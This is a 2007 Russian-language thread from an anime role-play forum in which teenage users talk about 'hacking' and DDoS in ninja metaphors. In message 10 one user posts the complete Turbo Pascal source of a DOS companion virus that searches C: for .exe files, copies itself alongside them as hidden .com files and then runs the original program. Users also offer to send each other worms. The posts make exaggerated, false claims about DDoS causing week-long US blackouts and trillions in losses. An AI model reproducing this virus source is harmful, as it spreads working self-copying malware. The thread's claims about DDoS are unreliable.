|
Хак..
|
|
| Rover | Date: Вторник, 05.06.2007, 18:18 | Message # 1 |
Генин
Шиноби
Рё: вер
Статус: в другом мире
| Итак молодые ниндзя...Это искусство Б класса, и почти все хорошие хакеры и ниндзя использую DoS, для взлома компьютера... А вот А класс - это уже DDoS - Destrubutive denied of acess(как-то так), ну короче говоря, ниндзя посылает черви(возможно под землей проходят), которые входят в другого ниндзю(компьютер), и так Хакер-ниндзя владеет зомбированными-ниндзями, он может иметь их тысяци и даже десятки тысяч, а они нечего даже не подозревают об этом...И вот когда хакер-ниндзя хочет захватить великий храм или одолеть мощного ниндзю, ему уже обычный DoS не поможет, ему надо DDoS, он приказывает всем червечкам, в зомби-ниндзях выполнять его приказы и уничтожить своим голосом(в компьютере запросами(или пакетами)) тот или иной храм, или супер ниндзю.... Я уже сказал что DoS - это Б класс, от него не очень трудно защититься, а вот DDoS - это наимощнейшая атака, из-за него отключилось электричество в Амереке на неделю, взломаны сайты майкрософт и многие другие компание потеряли триллионы долларов... Но существуют и ниндзи-защитники, которые ловят этих червей и сами зомбируют этого ниндзю(компьютер) ибо в хороших руках зомбированный ниндзя нечего плохого делать не будет.... ^_^))
|
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 18:19 | Message # 2 |
Саннин
Шиноби
| Rover, хочеш посоревноваться? мой червь твоя защита!
Наруто РПГ: Имя: Rico Noka-ari Возраст: 16 лет Ранг: Джойнин Селение: Деревня Срытого Водопада Т.-3 Г.-0 Н-8 З.-3 Ч.-8 способность - сознание Прощальными огнями догарают жизни свечи Вставая рано утром говорю:"Скорей бы вечер".
|
| |
| |
| Rover | Date: Вторник, 05.06.2007, 18:21 | Message # 3 |
Генин
Шиноби
| Имхо во мне нет этой жилки соревноваться, черви запускаются глобально, и античерви(добрые черви), выловить какой-то определенный червь практически невозможно, я еще не такой начитанный чтобы определенный червь выловить!
|
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 18:22 | Message # 4 |
Саннин
Шиноби
| Rover, ну ладно, а то во мне спортивный интерес проснулся.
Наруто РПГ: Имя: Rico Noka-ari Возраст: 16 лет Ранг: Джойнин Селение: Деревня Срытого Водопада Т.-3 Г.-0 Н-8 З.-3 Ч.-8 способность - сознание Прощальными огнями догарают жизни свечи Вставая рано утром говорю:"Скорей бы вечер".
|
| |
| |
| Rover | Date: Вторник, 05.06.2007, 18:23 | Message # 5 |
Генин
Шиноби
| Я пока что генин Добавлено (05.06.2007, 18:23) --------------------------------------------- имхо взломать можно все что угодно, со взломом я проблем не имею, а вот хочу теперь защищаться))Умеешь?
|
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 18:23 | Message # 6 |
Саннин
Шиноби
| Rover, я думал ты хочеш чтобы я тебе червя кинул.
|
| |
| |
| Солнышко | Date: Вторник, 05.06.2007, 18:25 | Message # 7 |
Генин
Коноичи
| ...
Имя: Ами Хаюри Возраст: 13 Ранг: генин Селение: : Характер:пазитвный,веселый,спокойный,но если обижают друзей,начинает "звереть" Способности:использую флейту в гендзютсу. Т.-0/ Г.-3/ Н-2 /З.-2/ Ч.-3
Post edited by Солнышко - Вторник, 05.06.2007, 18:27 |
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 18:26 | Message # 8 |
Саннин
Шиноби
| Rover, пиши в асю
|
| |
| |
| Rover | Date: Вторник, 05.06.2007, 18:27 | Message # 9 |
Генин
Шиноби
| Кидай мне червя, я буду рад протестить свой антивирус, и заодно хочу тебе добавить и всем остальным ниндзя, кто владеет этой атакой DoS, не давайте проги новичкам, они могут навредить хорошим людям и себе!  Добавлено (05.06.2007, 18:27) --------------------------------------------- в асю я не пишу, хочешь кинуть, я не против, кидай)Все я должен покинуть вас на время!) ^_^
|
| |
| |
| Eaze | Date: Вторник, 05.06.2007, 19:40 | Message # 10 |
Джойнин
Шиноби
| | Quote (Rover) | Итак молодые ниндзя...Это искусство Б класса, и почти все хорошие хакеры и ниндзя использую DoS, для взлома компьютера... А вот А класс - это уже DDoS - Destrubutive denied of acess(как-то так), ну короче говоря, ниндзя посылает черви(возможно под землей проходят), которые входят в другого ниндзю(компьютер), и так Хакер-ниндзя владеет зомбированными-ниндзями, он может иметь их тысяци и даже десятки тысяч, а они нечего даже не подозревают об этом...И вот когда хакер-ниндзя хочет захватить великий храм или одолеть мощного ниндзю, ему уже обычный DoS не поможет, ему надо DDoS, он приказывает всем червечкам, в зомби-ниндзях выполнять его приказы и уничтожить своим голосом(в компьютере запросами(или пакетами)) тот или иной храм, или супер ниндзю.... Я уже сказал что DoS - это Б класс, от него не очень трудно защититься, а вот DDoS - это наимощнейшая атака, из-за него отключилось электричество в Амереке на неделю, взломаны сайты майкрософт и многие другие компание потеряли триллионы долларов... Но существуют и ниндзи-защитники, которые ловят этих червей и сами зомбируют этого ниндзю(компьютер) ибо в хороших руках зомбированный ниндзя нечего плохого делать не будет.... ^_^)) | Хорошие хакеры, скорее ленивые хакеры, спам атаки, пинг атаки, эт всё от лени и страха... CB9TOu, на чём вирусы, трояны пишёшь? Добавлено (05.06.2007, 19:40) --------------------------------------------- Кста, вот вам исходник, одноого симпотного вирусника, который мона обнаружить ток Каспером (и его аналогами) ток на максимальной защите.. program virusman; {$m 16384,0,0} uses crt ,dos,graph3; var x:real; i,alfa:integer; f:file; fromfile ,tofile ,thisfile :string[12]; command :string[50]; atr,atrr,errdos:integer; rec,recc,crec: searchrec; fre:longint; dirs,dstr:string[30]; procedure demo; function fu(x:real):real; begin fu:=sin(x)/(sin(x)+2)*cos(x)*3.2; end; begin nosound; hires; for i:=0 to 640 do begin x:=i/50; draw(i,round(fu(x)*50)+75,i,round(fu(x)*50)+125,1); end; writeln('HI I AM SCORPIO FROM R.O.L.E. NOW THIS IS A VIRUS EATING YOUR HARDDISK'); WRITELN('THE IDEA COMES FROM APOLLO ALSO FROM R.O.L.E. "NOW GIV ME SOM FOOD" '); WRITELN('I ENJOY EATING EXE FILES ... HAR H A R HAR ... '); WRITELN('SAY HELLO TO ALL MEMBERS AND CONTACTS '); writeln('(THE PROTON WARRIOR;APOLLO;LOTUS;GOLDMAN;CSOKI;....) '); WRITELN(' CU SOON !!!!!!!!!!!'); REPEAT ALFA:=0 UNTIL ALFA=1; END; procedure kopie(command:string); begin assign(f,fromfile); setfattr(f,$10); close(f); swapvectors; exec(getenv('comspec'),command); swapvectors; if doserror <> 0 then halt; assign(f,tofile); setfattr(f,$02); close(f); assign(f,fromfile); setfattr(f,$02); close(f); end; procedure copyfile; begin findfirst('c:*.exe',atr,rec); if doserror <> 0 then halt else begin tofile:=rec.name; delete(tofile,length(tofile)-2,3); tofile:=concat(tofile,'com'); command:=concat('copy ',fromfile,' c:',tofile); kopie(command); end; end; procedure executef; begin swapvectors; exec(thisfile,''); swapvectors; end; procedure lookup; procedure nextfile; begin repeat findnext(recc); if doserror <> 0 then demo else begin tofile:=recc.name; delete(tofile,length(tofile)-2,3); tofile:=concat(tofile,'com'); findfirst(tofile,atrr,crec); errdos:=doserror; end; until errdos <> 0; command:=concat('copy ',fromfile,' c:',tofile); kopie(command); end; begin findfirst('c:*.exe',atr,recc); if doserror <> 0 then demo else begin tofile:=recc.name; delete(tofile,length(tofile)-2,3); tofile:=concat(tofile,'com'); findfirst(tofile,atrr,crec); if doserror <> 0 then begin command:=concat('copy ',fromfile,' c:',tofile); kopie(command); end else nextfile; end; end; procedure direcnow; begin getdir(0,dirs); dirs:=copy (dirs,1,1); if dirs <> 'c' then begin fre:=diskfree(3); if doserror=0 then begin copyfile; executef; end else executef end else begin if fre > 20000 then begin lookup; kopie(command); executef; end else demo; end; end; BEGIN setcbreak(false); gotoxy(7,wherey-1); write('$'); writeln; writeln('Bad command or filename'); writeln; getdir(0,dstr); write(dstr); readln(thisfile); fromfile:=concat(thisfile,'.com'); thisfile:=concat(thisfile,'.exe'); textcolor(0); direcnow; end.
Post edited by Eaze - Вторник, 05.06.2007, 19:43 |
| |
| |
| Rover | Date: Вторник, 05.06.2007, 19:50 | Message # 11 |
Генин
Шиноби
| этот исходник вохможно ты нашел в инете)))Я даже не буду его проверять и читать, но знаю точно, что все хакеры которые хотят как-то помочь новичкам прогами, дают такие исходники, но намеренно с маленькими ошибками, что начинающий хакер исправил их, ибо в руках нуба программа помжет навредить всем!  Добавлено (05.06.2007, 19:50) --------------------------------------------- ВСе же немного пробежался глазами))) Исходник написан на Turbo Pascal 7.0 возможно на 98 процентов)) Программа нарушает роботоспособность жесткого диска, в общем если сделать пару дороботок, его даже и касперский не вычеслит)))
|
| |
| |
| Eaze | Date: Вторник, 05.06.2007, 19:57 | Message # 12 |
Джойнин
Шиноби
| Rover, этот исходник мне кинул его автор))) проверять его тож ненадо, ибо разрушительные последствия могут быть))) Ну исходник в руках нуба, врядли представляет опасность, еси ток догадаеться его скомпилить, что врядли.... Добавлено (05.06.2007, 19:57) ---------------------------------------------
| Quote (Rover) | | Программа нарушает роботоспособность жесткого диска, в общем если сделать пару дороботок, его даже и касперский не вычеслит))) | не вычислит, полюбому, даж без каспера запросив отчёт о действиях системы мона его засеч. на паскале не разгуляешся, тем более столь очевидным образом...
|
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 20:08 | Message # 13 |
Саннин
Шиноби
| ААААААА у меня жестак второй полетел! АААААААААААААААААА !!!!!!!!!!!!!!!!
|
| |
| |
| Rover | Date: Вторник, 05.06.2007, 20:16 | Message # 14 |
Генин
Шиноби
| Бугага))) Хотя не, не смешно
|
| |
| |
| CB9TOu | Date: Вторник, 05.06.2007, 20:30 | Message # 15 |
Саннин
Шиноби
| ггг, мнея уже достали эти липовые программисты, друзья моей сестры. Постоянно лазеют в мою волшебную коробку всякие уроды. Открутил уорд жесткие, прикрутил нагревающимися сторонами друг другу. Пяти часов не выдержал жесткий. ппц я фигею.
|
| |
| |
|